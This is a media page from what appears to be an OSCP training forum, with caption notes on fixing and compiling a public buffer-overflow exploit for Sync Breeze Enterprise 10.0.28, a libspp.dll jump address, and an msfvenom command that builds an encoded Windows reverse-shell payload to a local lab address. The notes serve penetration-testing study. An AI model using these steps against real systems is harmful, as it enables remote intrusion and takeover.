Ahmed.Attia

48 Fixing Exploits | Offensive Security Certified Professional

There are no comments to display.

Media information

Album
OSCP
Added by
Ahmed.Attia
Date added
View count
1,679
Comment count
0
Rating
0.00 star(s) 0 ratings

Caption

Sync Breeze Enterprise 10.0.28

https://www.vultr.com/docs/how-to-install-cms-made-simple-2-2-on-an-ubuntu-16-04-lamp-vps


Code:
sudo apt install mingw-w64
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
########
sudo apt install wine
sudo dpkg --add-architecture i386
sudo apt-get update
sudo dpkg --configure -a
sudo apt-get install wine32
"\x83\x0c\x09\x10"
# jmp = 10090c83 libspp.dll


msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.8 LPORT=443 EXITFUNC= thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\3d"

Share this media

Top